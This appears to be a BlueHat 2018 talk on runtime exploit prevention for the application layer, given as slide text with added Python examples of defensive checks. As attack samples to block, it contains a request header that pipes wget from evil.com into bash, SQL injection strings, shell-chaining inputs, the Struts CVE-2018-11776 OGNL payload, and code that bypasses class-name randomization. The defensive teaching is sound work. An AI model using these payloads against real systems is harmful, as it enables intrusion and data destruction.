
BlueHat v18 || Dep for the app layer - time for app sec to grow up

Arshan Dabirsiaghi, Contrast Security
Matt Austin, Contrast Security

Nothing in the security industry has moved the needle like Data Execution Prevention and its sister protections like ASLR.

The availability of secure APIs, the training of developers around the world, and the efforts of security practitioners have all produced very little compared to the gains delivered by DEP, ASLR and the other "automatic" protections provided by the toolchain and the OS itself.

Where is the equivalent in the Application Layer? Can we use these same techniques and approaches to stop SQL Injection and Deserialization attacks? Can we give developers a "secure stack by default" for any application?

In this talk we'll show you the promising results of our research into this space using binary instrumentation, including the release of free tools that developers can use to protect their applications today from several bug classes, instantly, and without any code changes.

BlueHat v18 || Dep for the app layer - time for app sec to grow up

  1. WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL. DEP FOR THE APP LAYER: Time for AppSec to Grow Up. BlueHat 2018, September 26, 2018. Arshan Dabirsiaghi, Chief Scientist; Matt Austin, Director of Security Research.
  2. WHO ARE WE? Arshan Dabirsiaghi, Founder & Chief Scientist: career application security researcher. Credited with many CVEs. Released popular application security tools including AntiSamy and JavaSnoop. Black Hat speaker. Absolutely hates the above picture. Matt Austin, Director of Security Research: career application security researcher. Credited with way more CVEs than Arshan. Hall of Fame bounty hunter for Facebook and Google. DEF CON speaker. Absolutely hates the above picture.
  3. TAILORED SECURITY NEVER SCALES: JAVA POLICY
  4. TAILORED SECURITY NEVER SCALES: CONTENT SECURITY POLICY. Example policy from Twitter (source: OWASP CSP Cheat Sheet).
  5. TAILORED SECURITY NEVER SCALES: SELINUX
       allow staff_usertype unreserved_port_t : udp_socket name_bind ;
       DT allow staff_usertype unreserved_port_type : tcp_socket name_bind ; [ selinuxuser_tcp_server ]
       DT allow nsswitch_domain unreserved_port_t : tcp_socket { name_bind name_connect } ; [ nis_enabled ]
       DT allow nsswitch_domain unreserved_port_t : udp_socket name_bind ; [ nis_enabled ]
  6. TAILORED SECURITY NEVER SCALES: THE WAF. From an actual WAF vendor datasheet:
       SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" "id:9005000, phase:1, pass, t:none, nolog, skipAfter:END-CPANEL"
  7. SECURITY GETS BETTER CLOSER TO BOOM: Network Firewall, Host Firewall, IDS + IPS, DEP + ASLR, WAF, and ? (the application layer has no equivalent yet).
  8. LET'S TALK ABOUT WHAT WORKS
       Security mechanism | What it does
       DEP                | Prevents user-provided cargo code from executing
       ASLR               | Prevents the attacker from knowing where their desired code is
       Stack cookies      | Infer the corruption of application integrity
       Browser sandbox    | Raises the cost of exploit development
  9. WHERE SHOULD WE INVEST? Why does AppSec only include the first column?
       People-centric (Developer Training, Secure Coding APIs, Internal Product Testing, Secure Coding Guidelines): these activities don't scale. Up-front and ongoing cost built on hope: hope they use it, hope they understand it, hope they catch the bug. Invisible to users.
       Automatic (DEP, ASLR, SEHOP, SafeSEH): big up-front cost; kill bug classes, forever; invisible to developers and users.
  10. PORTING PROTECTIONS to the Application Layer
  11-13. USING AN AGENT TO ADD SECURITY (three consecutive slides with the same title)
  14. RUNTIME EXPLOIT PREVENTION (REP): six protection types
       Input classification: identify clear attacks and prevent processing; reject malformed input
       Volumetric analysis: identify patterns of input that represent an attack
       Input tracing: identify when user input introduces code that will run in an interpreter
       Semantic analysis: detect input causing injection and malicious behavior
       Hardening: enable, improve, configure, enhance, apply
       Sandboxing: during risky behaviors, prevent execution of common exploit paths
  15. PROTECTION TYPE 1: INPUT CLASSIFICATION. Applies to: obvious exploit attempts, HTTP method tampering, header tampering.
  16. PROTECTION TYPE 1: INPUT CLASSIFICATION. Example request:
       JEFF /widgets HTTP/1.0
       Host: foo.com
       Content-Length: -150
       Content-Type: aaaaaaaaaaaaaaa[... 1024 ...]
       Accept: */*;' /bin/bash -c wget http://evil.com/

       widget=selected_widget
     JEFF is not an HTTP method; Content-Length -150 is a definitely invalid value; no Content-Type should be longer than 25 characters; the Accept header carries a command injection attack: stop it at the perimeter.
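The classifier on slide 16 in working form, as an added Python example (not code from the slides or from Contrast's agent): parse the raw request above, apply the method, length and value checks, and return the findings. The method allowlist, the per-header limits and the shell-command signature are this example's assumptions; the slide's 25-character Content-Type limit is tighter than real traffic allows (application/x-www-form-urlencoded alone is 33 characters), so the limit is a per-header parameter here.

```python
import re

# Allowlists and limits are this example's assumptions, not the slide's numbers:
# the 25-character Content-Type limit on the slide would reject
# application/x-www-form-urlencoded (33 chars), so limits are per header.
ALLOWED_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH"}
HEADER_LIMITS = {"content-type": 128, "accept": 256, "host": 253}
DEFAULT_HEADER_LIMIT = 4096

# Only the blatant cases belong in a classifier; subtler injection is left to
# input tracing and semantic analysis later in the request's life.
SHELL_SIGNATURE = re.compile(
    r"""(^|[;|&`'"])\s*/bin/(?:ba)?sh\b|\b(?:wget|curl)\s+https?://"""
)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, _, rest = lines[0].partition(" ")
    target = rest.split(" ")[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def classify(raw):
    """Return a list of (location, reason); an empty list means the request
    passed classification and may continue into the application."""
    method, _, headers, _ = parse_request(raw)
    findings = []
    if method not in ALLOWED_METHODS:
        findings.append(("method", f"not an HTTP method: {method!r}"))
    length = headers.get("content-length")
    if length is not None and not length.isdigit():
        findings.append(("content-length", f"definitely invalid value: {length!r}"))
    for name, value in headers.items():
        limit = HEADER_LIMITS.get(name, DEFAULT_HEADER_LIMIT)
        if len(value) > limit:
            findings.append((name, f"length {len(value)} exceeds {limit}"))
        if SHELL_SIGNATURE.search(value):
            findings.append((name, "shell command in header value"))
    return findings


# Constructed sample: the request from the slide, with the 1024 'a's spelled out.
SLIDE_REQUEST = (
    "JEFF /widgets HTTP/1.0\n"
    "Host: foo.com\n"
    "Content-Length: -150\n"
    "Content-Type: " + "a" * 1024 + "\n"
    "Accept: */*;' /bin/bash -c wget http://evil.com/\n"
    "\n"
    "widget=selected_widget"
)

if __name__ == "__main__":
    for location, reason in classify(SLIDE_REQUEST):
        print(f"{location}: {reason}")
```

Every check here is decidable from the request alone, which is what makes input classification cheap enough to run at the perimeter; anything that needs to know where the value ends up is deferred to the later protection types.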
  17. PROTECTION TYPE 2: VOLUMETRIC ANALYSIS. Applies to: Regex DoS, Padding Oracle.
  18. PROTECTION TYPE 2: VOLUMETRIC ANALYSIS. Padding oracle:
       import javax.crypto.Cipher;

       Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
       cipher.init(Cipher.DECRYPT_MODE, key, iv);
       byte[] plaintext = cipher.doFinal(userInput); // BadPaddingException is not handled: the error reaches the attacker
  19. PROTECTION TYPE 2: VOLUMETRIC ANALYSIS. Padding oracle, three steps: (1) hook the exception handler for javax.crypto.BadPaddingException; (2) track errors by IP; (3) block the attacker.
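The three steps on slide 19 in working form, as an added Python example (not code from the slides or from Contrast's agent): a strict PKCS#7 unpadder that raises the error an oracle attack probes for, a guard that counts those errors per client IP in a sliding window, and a wrapper that hooks the error path the way the agent does without the application changing. The threshold, the window, the client addresses and the attacker loop are constructed for this example; AES itself is left out so the block runs without a crypto library, which does not change the counting logic.

```python
import collections
import time


class BadPaddingError(Exception):
    """Stand-in for javax.crypto.BadPaddingException."""


def unpad_pkcs7(block, block_size=16):
    """Strict PKCS#7 unpadding. Raising on bad padding is correct; leaking
    whether it raised, request by request, is what makes the oracle."""
    if not block or len(block) % block_size:
        raise BadPaddingError("bad length")
    n = block[-1]
    if n < 1 or n > block_size or block[-n:] != bytes([n]) * n:
        raise BadPaddingError("bad padding")
    return block[:-n]


class PaddingOracleGuard:
    """Steps 2 and 3 of the slide: count BadPaddingError per client IP inside a
    sliding window and block the client once it passes the threshold. Honest
    clients almost never hit bad padding; an oracle attack needs up to 256
    tries per byte, so a low threshold is safe."""

    def __init__(self, threshold=10, window_seconds=60, clock=time.monotonic):
        self.threshold = threshold
        self.window = window_seconds
        self.clock = clock                      # injectable so tests control time
        self.errors = collections.defaultdict(collections.deque)
        self.blocked = set()

    def is_blocked(self, client_ip):
        return client_ip in self.blocked

    def record_error(self, client_ip):
        now = self.clock()
        recent = self.errors[client_ip]
        recent.append(now)
        while recent and now - recent[0] > self.window:
            recent.popleft()
        if len(recent) >= self.threshold:
            self.blocked.add(client_ip)

    def guarded(self, decrypt):
        """Step 1: wrap the decrypt call the way an agent hooks the exception
        path, so the application keeps its unhandled-error code unchanged."""
        def wrapper(client_ip, data):
            if self.is_blocked(client_ip):
                raise PermissionError(f"{client_ip} blocked: padding oracle attempt")
            try:
                return decrypt(data)
            except BadPaddingError:
                self.record_error(client_ip)
                raise
        return wrapper


def simulate_attack(guard, attempts=300, attacker="203.0.113.7"):
    """Constructed attacker: tampers with the last byte of a block 300 times,
    as a padding oracle attack does per byte. Returns how many attempts the
    guard refused outright after the client was blocked."""
    decrypt = guard.guarded(unpad_pkcs7)
    valid_block = b"A" * 12 + b"\x04" * 4        # 12 bytes of data, 4 of padding
    refused = 0
    for guess in range(attempts):
        if guard.is_blocked(attacker):
            refused += 1
            continue
        tampered = valid_block[:-1] + bytes([guess % 256])
        try:
            decrypt(attacker, tampered)
        except BadPaddingError:
            pass                                # the oracle answer the attacker wants
    return refused
```

With the default threshold of 10 the attacker is cut off after the twelfth guess (two of the first twelve last-byte values happen to form valid padding), long before the 128 tries a single byte needs on average.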
  20. PROTECTION TYPE 3: INPUT TRACING. Applies to: SQL Injection, Expression Language Injection, Local File Include, ... many others. (Diagram: apps and data feeding an interpreter.)
  21. PROTECTION TYPE 3: INPUT TRACING. DEP #1: Prevent cargo code from executing. Login form: Username: test@example.com' or 1=1;-- Password: anything...
       string user = Request.Parameters["username"];
       // build the query
       cmd.CommandText = "SELECT * FROM USERS where userId='" + user + "'…";
       …
       sqlConnection1.Open();
       // execute the query
       reader = cmd.ExecuteReader();
       sqlConnection1.Close();
     Untrusted data received: POST /login/ name=test@example.com' or 1=1;-- . Injected query blocked (test@example.com' or 1=1;--). Response safely redirected: Response.StatusCode = 403; content-type: text/html; charset=UTF-8, status: 403 (forbidden).
  22. PROTECTION TYPE 3: INPUT TRACING. DEP #2: Cargo code attempts execution. At cmd.ExecuteReader(), cmd.CommandText is:
       SELECT * FROM USERS where userId='test@example.com' or 1=1;-- ' and password='anything...'
     Parsed: SELECT statement [Result: *] [Table ID: USERS] [WHERE clause: Or expression of (Column = Expression: userId='test@example.com') and (Literal op Literal: 1=1)], followed by a Comment block (-- ' and password='anything...') that swallows the rest of the original query. The user-supplied value spans the literal, the Or expression and the comment block.
  23. PROTECTION TYPE 3: INPUT TRACING. DEP #3: Trigger the rule. (1) Untrusted user input: test@example.com' or 1=1;-- (2) Sink called: cmd.CommandText = "SELECT * FROM USERS where userId='" + user + "'…"; (3) Query analyzed, token boundary crossed: SELECT * FROM USERS where userId='test@example.com' or 1=1;-- ' and password='anything' (4) Block the action!
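Slides 21 to 23 in working form, as an added Python example rather than the .NET code on the slide or Contrast's agent: a minimal SQL lexer, a taint-carrying string that records which ranges of the final statement came from the request, and the rule applied at the sink, which allows the query only if every untrusted range sits inside a single string or number literal. The lexer, the Tainted class and build_login_query are this example's own constructions; a real agent propagates the ranges by instrumenting the runtime's string operations instead of asking the application to use a wrapper type.

```python
import re

# Minimal SQL lexer: just enough to see which tokens a user-controlled value
# occupies in the final statement. Alternation order matters: comments before
# the '-' and '/' operators, multi-character operators before single ones.
TOKEN = re.compile(r"""
      (?P<string>'(?:[^']|'')*')
    | (?P<comment>--[^\n]*|/\*.*?\*/)
    | (?P<number>\d+(?:\.\d+)?)
    | (?P<ident>[A-Za-z_][A-Za-z0-9_.]*)
    | (?P<op><>|<=|>=|!=|[=<>*,;()+\-/])
    | (?P<ws>\s+)
""", re.VERBOSE | re.DOTALL)


def tokenize(sql):
    """Return (kind, start, end) for every non-whitespace token."""
    pos, tokens = 0, []
    while pos < len(sql):
        m = TOKEN.match(sql, pos)
        if not m:
            raise ValueError(f"cannot lex {sql[pos:pos + 12]!r} at offset {pos}")
        if m.lastgroup != "ws":
            tokens.append((m.lastgroup, m.start(), m.end()))
        pos = m.end()
    return tokens


class Tainted:
    """A string that remembers which [start, end) ranges came from untrusted
    input. Concatenation propagates the ranges, which is what the agent's
    instrumentation of string operations does on the application's behalf."""

    def __init__(self, text="", spans=()):
        self.text, self.spans = text, list(spans)

    @classmethod
    def untrusted(cls, value):
        return cls(value, [(0, len(value))])

    def __add__(self, other):
        if isinstance(other, Tainted):
            shift = len(self.text)
            return Tainted(self.text + other.text,
                           self.spans + [(s + shift, e + shift) for s, e in other.spans])
        return Tainted(self.text + other, self.spans)

    def __radd__(self, other):          # str + Tainted
        return Tainted(other) + self


def check_sink(query):
    """The rule at cmd.ExecuteReader(): allow only if every untrusted span sits
    inside one string or number literal. Returns (allowed, reason)."""
    try:
        tokens = tokenize(query.text)
    except ValueError as err:
        return False, f"query does not lex: {err}"
    for start, end in query.spans:
        hit = [t for t in tokens if t[1] < end and t[2] > start]
        if len(hit) != 1 or hit[0][0] not in ("string", "number"):
            kinds = [kind for kind, _, _ in hit]
            return False, f"untrusted data crosses token boundaries: {kinds}"
    return True, "untrusted data confined to one literal"


def build_login_query(username, password):
    """The vulnerable concatenation from the slide, with both inputs tainted."""
    user = Tainted.untrusted(username)
    pw = Tainted.untrusted(password)
    return "SELECT * FROM USERS where userId='" + user + "' and password='" + pw + "'"
```

The rule needs no signature of what an attack looks like: the slide's payload is blocked because its range overlaps a string literal, an identifier, two numbers, two operators and a comment, while a legitimate e-mail address, however odd, stays inside one literal. The same check blocks a bare `5 OR 1=1` in a numeric context, where no quote is involved at all.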
  24. PROTECTION TYPE 4: SEMANTIC ANALYSIS. Applies to: SQL Injection, Command Injection.
  25. PROTECTION TYPE 4: SEMANTIC ANALYSIS. Why do we need semantic analysis if we have input tracing? Input does not only reach the interpreter from the app's own request handling: it can arrive through a 3rd party or another app, where there is no traced source, so the statement handed to the interpreter has to be judged on its own.
  26. PROTECTION TYPE 4: SEMANTIC ANALYSIS. SQL: tautology-based attacks.
       SELECT * FROM USERS where userId='test@example.com' or 1 <> sqrt(4);
     The WHERE clause is an Or expression whose right-hand side, 1 <> sqrt(4), is a tautology (op between two terms that always compare unequal). Can't detect this without pseudo-evaluation!
  27. PROTECTION TYPE 4: SEMANTIC ANALYSIS. SQL: union to unsafe table.
       SELECT * FROM USERS where userId='test@example.com' UNION SELECT 1 FROM information_schema.tables
     A Union statement: the original SELECT statement with its WHERE clause, joined to a second SELECT statement whose table name is information_schema.tables.
  28. PROTECTION TYPE 4: SEMANTIC ANALYSIS. SQL: chaining-based attacks.
       SELECT * FROM USERS where userId='test@example.com' ; DROP TABLE USERS;
     The SELECT statement (with its WHERE clause) is followed by a chained statement.
  29. PROTECTION TYPE 4: SEMANTIC ANALYSIS. Command injection.
     Variable expansion:
       ping -c 4 $(echo 8.8.8.8`sleep 5`)
     The script's suffix contains an expansion, $( ... ), which itself contains another expansion, `sleep 5`.
     Command chaining:
       ping -c 4 8.8.8.8 ; sleep 5
     The script is followed by ; and a second script.
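The command-injection half of semantic analysis (slide 29) in working form, as an added Python example that is not code from the slides or from Contrast's agent: scan the command line the application is about to hand to the shell, honoring quotes and backslash escapes, and report every chaining operator and command substitution the shell would act on. No knowledge of where the input came from is needed, which is the point of slide 25. The operator table and the rule "one command, or block" are this example's assumptions; a real agent would hook the process-spawning API and apply the check there.

```python
# Control operators the shell honors outside quotes. Multi-character operators
# come first so "&&" is not read as two "&".
CHAIN_OPERATORS = ("&&", "||", ";", "|", "&", "\n")


def analyze_command(cmdline):
    """Return (kind, text, offset) for every chaining operator or command
    substitution the shell would act on. A line the developer wrote as a
    single command yields an empty list."""
    findings = []
    i, n = 0, len(cmdline)
    quote = None                          # "'" or '"' while inside quotes
    while i < n:
        c = cmdline[i]
        if c == "\\" and quote != "'":    # escaped character: never an operator
            i += 2
            continue
        if quote == "'":                  # single quotes: nothing is special
            if c == "'":
                quote = None
            i += 1
            continue
        if quote == '"':                  # double quotes: expansions still happen
            if c == '"':
                quote = None
            elif c == "`":
                findings.append(("expansion", "`", i))
            elif cmdline.startswith("$(", i):
                findings.append(("expansion", "$(", i))
            i += 1
            continue
        if c in ("'", '"'):
            quote = c
            i += 1
            continue
        if c == "`":
            findings.append(("expansion", "`", i))
            i += 1
            continue
        if cmdline.startswith("$(", i):
            findings.append(("expansion", "$(", i))
            i += 2
            continue
        if c == "&" and not cmdline.startswith("&&", i) and i > 0 and cmdline[i - 1] in "<>":
            i += 1                        # 2>&1 is a redirection, not a chain
            continue
        for op in CHAIN_OPERATORS:
            if cmdline.startswith(op, i):
                findings.append(("chain", op, i))
                i += len(op)
                break
        else:
            i += 1
    return findings


def is_single_command(cmdline):
    """Semantic rule at the exec sink: block if the interpreter would run
    anything beyond the one command the developer wrote."""
    return not analyze_command(cmdline)
```

Both payloads from the slide are caught for the reason the slide gives, an expansion nested inside an expansion and a chained second script, while a quoted `;` in a grep pattern or a `2>&1` redirection passes, because the scanner follows the shell's own quoting rules rather than searching for characters.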
  30. PROTECTION TYPE 5: HARDENING. Applies to: XXE, Expression Language Injection.
  31-32. PROTECTION TYPE 5: HARDENING. What does "ASLR" look like for an app? Inside the JVM, other code reaches java.lang.Runtime by name; rename it to something unguessable such as java.lang.$$0x7A69$$Runtime and code that looks it up by name no longer finds it.
  33-35. PROTECTION TYPE 5: HARDENING. Bypassing app "ASLR" #1: Object graph. The exploit code's lookup of java.lang.Runtime fails (it is now java.lang.$$0x7A69$$Runtime), so find a known type (java.lang.AnotherJavaType) that already has a reference to java.lang.Runtime, and use its reference instead of trying to look up or create your own!
  36-38. PROTECTION TYPE 5: HARDENING. Bypassing app "ASLR" #2: Lookup by non-name signature. java.lang.instrument.Instrumentation.getAllLoadedClasses(): loop through every class. Does it have the same number of fields as Runtime? Same types? Same serialVersionUID? Try it! If not, go to the next one. Only 20k classes!
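Both bypasses from slides 33 to 38, as an added Python example that is not code from the slides or from Contrast's agent. A Runtime stand-in class is re-registered under a random name (the "app ASLR" of slide 32); bypass #1 then recovers it from a type that already holds a reference, and bypass #2 recovers it by walking every class the interpreter knows about and matching on shape (method names and arities, attribute names) instead of name, the Python analogue of Instrumentation.getAllLoadedClasses(). The Runtime and ProcessBuilder classes and the fingerprint are this example's constructions.

```python
import gc
import inspect
import secrets
import types


class Runtime:
    """Stand-in for java.lang.Runtime: the capability an exploit wants."""
    version = "1.0"

    def __init__(self):
        self.env = {}

    def exec(self, cmd):
        return f"would run {cmd!r}"

    def available_processors(self):
        return 4


class ProcessBuilder:
    """A known type that already holds a reference to Runtime (bypass #1)."""
    runtime_cls = Runtime


def randomize_name(cls, namespace):
    """The 'hardening': re-register cls under an unguessable name and remove
    the well-known one, so lookups by name fail."""
    new_name = f"$${secrets.token_hex(2)}$${cls.__name__}"
    namespace.pop(cls.__name__, None)
    cls.__name__ = cls.__qualname__ = new_name
    namespace[new_name] = cls
    return new_name


def signature(cls):
    """Name-independent fingerprint: (method name, parameter count) pairs plus
    the names of non-callable class attributes, the analogue of the slide's
    'same number of fields, same types'."""
    methods = tuple(sorted(
        (name, len(inspect.signature(fn).parameters))
        for name, fn in vars(cls).items() if isinstance(fn, types.FunctionType)))
    attrs = tuple(sorted(
        name for name, value in vars(cls).items()
        if not callable(value) and not name.startswith("__")))
    return methods, attrs


RUNTIME_SIGNATURE = signature(Runtime)   # captured before the rename, by the "attacker"


def find_by_object_graph():
    """Bypass #1: ask a type that already references Runtime."""
    return ProcessBuilder.runtime_cls


def find_by_signature(wanted=RUNTIME_SIGNATURE):
    """Bypass #2: walk every class the interpreter has loaded and match by
    shape, not name. A few thousand classes is a trivial search."""
    for obj in gc.get_objects():
        if isinstance(obj, type):
            try:
                if signature(obj) == wanted:
                    return obj
            except (TypeError, ValueError):
                continue
    return None


# Apply the hardening to this module: after this line the name Runtime is gone.
HARDENED_NAME = randomize_name(Runtime, globals())
```

The renamed class is still reachable by both routes because nothing about the object's capability changed, only its label; that is why the slides put the real gains under hardening of insecure defaults (slide 39) and sandboxing of the capability itself (slides 40 onward) rather than in hiding it.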
  39. PROTECTION TYPE 5: HARDENING. XXE: insecure by default, just-in-time security.
       InputStream is = httpRequest.getInputStream();
       DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); // insecure by default!
       // BEGIN CONTRAST INJECTION
       try {
           factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
       } catch (Throwable t) { }
       // END CONTRAST INJECTION
       DocumentBuilder docBuilder = factory.newDocumentBuilder();
       doc = docBuilder.parse(is); // BOOM!
     (The injection shown disables external general entities. Complete XXE hardening also sets http://xml.org/sax/features/external-parameter-entities to false and, where the application does not need DTDs, http://apache.org/xml/features/disallow-doctype-decl to true.)
  40. PROTECTION TYPE 6: SANDBOXING. Applies to: Expression Language Injection, Deserialization, ... many others.
  41. PROTECTION TYPE 6: SANDBOXING. Browser (application) sandbox: untrusted code runs in the browser, and its powerful API calls to the operating system pass through the sandbox. The cost of exploit development is raised by forcing the attacker to discover sandbox bypasses.
  42. PROTECTION TYPE 6: SANDBOXING. Struts CVE-2018-11776, OGNL injection: Struts hands the expression to OGNL inside the JVM; the sandbox cuts OGNL's path to Runtime.
  43. PROTECTION TYPE 6: SANDBOXING. Struts CVE-2018-11776, OGNL injection. The request:
       GET /struts2-showcase/${( _memberAccess["allowStaticMethodAccess"]=true, #a=@java.lang.Runtime@getRuntime().exec('id')... )}/actionChain1.action HTTP/1.0
  44. PROTECTION TYPE 6: SANDBOXING. Struts CVE-2018-11776, OGNL injection. The stack when the sandbox fires:
       com.opensymphony.xwork2.ActionProxy.getMethod()        <- source
       ...
         ↳ ognl.Ognl.getValue(Ognl.java)                       <- start of "sandbox"
         ↳ ognl.OgnlUtil.compileAndExecute(OgnlUtil.java:405)
         ↳ ...
         ↳ java.lang.Runtime.exec(Runtime.java:152)            <- blocked method
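The stack-based sandbox of slide 44 in working form, as an added Python example that is not code from the slides or from Contrast's agent: the evaluator marks its own frame as the start of the sandbox, the hooked sink walks the call stack, and an exec reached through expression evaluation is refused while the same call from trusted code goes through. Python's eval stands in for the OGNL interpreter, and the Runtime class, the marker name and handle_request are this example's constructions; the empty `__builtins__` is not what makes this safe, the guard on the sink is.

```python
import sys


class SandboxViolation(RuntimeError):
    pass


SANDBOX_MARKER = "__rep_sandbox__"


def in_sandbox():
    """Walk the call stack looking for a frame that declared itself the start
    of a sandbox, the way the agent looks for the OGNL entry point."""
    frame = sys._getframe(1)
    while frame is not None:
        if frame.f_locals.get(SANDBOX_MARKER):
            return True
        frame = frame.f_back
    return False


def guarded_exec(cmd):
    """The hooked 'blocked method' (java.lang.Runtime.exec on the slide).
    Trusted code may call it; code reached through the evaluator may not."""
    if in_sandbox():
        raise SandboxViolation(f"exec({cmd!r}) attempted during expression evaluation")
    return f"ran {cmd}"


class Runtime:
    """Stand-in for java.lang.Runtime as exposed to the expression language."""

    def exec(self, cmd):
        return guarded_exec(cmd)


def evaluate(expression, context):
    """Start of the sandbox (ognl.Ognl.getValue on the slide). Python's eval
    stands in for the OGNL interpreter: everything below this frame is
    untrusted, whatever the expression manages to reach."""
    __rep_sandbox__ = True   # read by in_sandbox() through frame inspection
    return eval(expression, {"__builtins__": {}}, dict(context))


def handle_request(untrusted_expression):
    """The action that evaluates an expression taken from the request.
    Returns (status, detail): 200 with the result, 403 when the sandbox fires."""
    context = {"runtime": Runtime(), "name": "widget"}
    try:
        return 200, evaluate(untrusted_expression, context)
    except SandboxViolation as violation:
        return 403, str(violation)
```

The rule is keyed on the call path rather than on the payload, which is what lets it survive OGNL-syntax tricks: however the expression spells its way to exec, the evaluator's frame is still below it on the stack.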
  45. COMBINING 3 PROTECTION STRATEGIES ON OGNL INJECTION. Input classification: identify obvious OGNL in the request and block. Input tracing: identify input that could possibly be OGNL and check whether it made it to the OGNL API and is about to be evaluated. Sandboxing: prevent common exploit paths from working while within OGNL evaluation.
  46. GOALS OF RUNTIME EXPLOIT PREVENTION (REP). Kill bug classes: SQL Injection, Padding Oracle, XML External Entity (XXE), ... Be invisible to end users: practically no performance overhead. Be invisible to developers: no code changes or rule tuning.
  47. CONCLUSIONS
  48. IN SUMMARY
       DEP (+ ASLR etc.): injected by the OS and compiler; aims to prevent EIP=attacker_controlled (one interpreter, the CPU); weaves around meta-programming points.
       REP: injected into the app runtime as an agent; aims to prevent many unique exploitation conditions in many different interpreters; weaves around high-level APIs from the runtime, OSS and commercial packages.
  49. HOW DO WE GET THERE? A runtime agent per ecosystem, hooking the same three API families.
       .NET ecosystem (Microsoft): 1. Request processing API, 2. SQL API, 3. XML API -> runtime agent
       Node.js ecosystem: express (OSS) request processing API; knex.js (OSS) SQL API; xml-parser (OSS) XML API -> runtime agent
  50. CONTRAST COMMUNITY EDITION. 16M developers in the world; only 6% have access to decent security tools. Totally free and full-strength application security platform: assess web apps and APIs for vulnerabilities; monitor open source; runtime exploit prevention. Faster, more accurate, more scalable, better integrated, and more DevSecOps-friendly than any other application security solution.
  51. THANK YOU. Arshan Dabirsiaghi | arshan.dabirsiaghi@contrastsecurity.com; Matt Austin | matt.austin@contrastsecurity.com
